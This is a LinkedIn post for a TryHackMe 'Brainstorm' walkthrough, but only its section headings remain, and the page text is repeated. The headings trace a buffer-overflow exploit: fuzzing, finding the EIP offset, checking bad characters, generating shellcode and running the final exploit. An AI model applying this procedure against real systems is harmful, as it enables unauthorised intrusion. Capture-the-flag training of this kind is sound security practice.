1 条评论

Brainstorm - tryhackme walkthrough

Vamsi Krishna C V

System Engineer at Leonteq Security Solution, GMBH

nmap scan

Anonymous Login

How does the exe work:

Fuzzing:

Generating pattern using metasploit scripts:

Finding the EIP Offset

Replacing the EIP

Finding bad characters:

领英推荐

Finding the right module

Generating the Shell code

Final exploit of the original machine

Vamsi Krishna C V的更多文章

社区洞察

其他会员也浏览了

Hiding Malicious Code In a Contract

More than 36 Malicious npm Packages Uncovered, Aiming to Steal Developer Data

Malicious AI Model Protection with CodeLock

Archangel Writeup

How to hack "smasher2" on hackthebox.eu

TryHackMe: Walking An Application Writeups By Md Mirajul Haque Miraj || MirajulHaque || Security Path

Establishing a Harbor Container Registry Integrated with Trivy for Comprehensive Vulnerability Assessment

How to Tunnel and Pivot Networks using Ligolo-ng

XSS (DOM) [DVWA]

Seppuku | OffSec Writeup

nmap scan

Anonymous Login

How does the exe work:

Fuzzing:

Generating pattern using metasploit scripts:

Finding the EIP Offset

Replacing the EIP

Finding bad characters:

领英推荐

Finding the right module

Generating the Shell code

Final exploit of the original machine

Vamsi Krishna C V的更多文章

Proving Grounds Practice - Internal Walkthrough

社区洞察

其他会员也浏览了

Hiding Malicious Code In a Contract

More than 36 Malicious npm Packages Uncovered, Aiming to Steal Developer Data

Malicious AI Model Protection with CodeLock

Archangel Writeup

How to hack "smasher2" on hackthebox.eu

TryHackMe: Walking An Application Writeups By Md Mirajul Haque Miraj || MirajulHaque || Security Path

Establishing a Harbor Container Registry Integrated with Trivy for Comprehensive Vulnerability Assessment

How to Tunnel and Pivot Networks using Ligolo-ng

XSS (DOM) [DVWA]

Seppuku | OffSec Writeup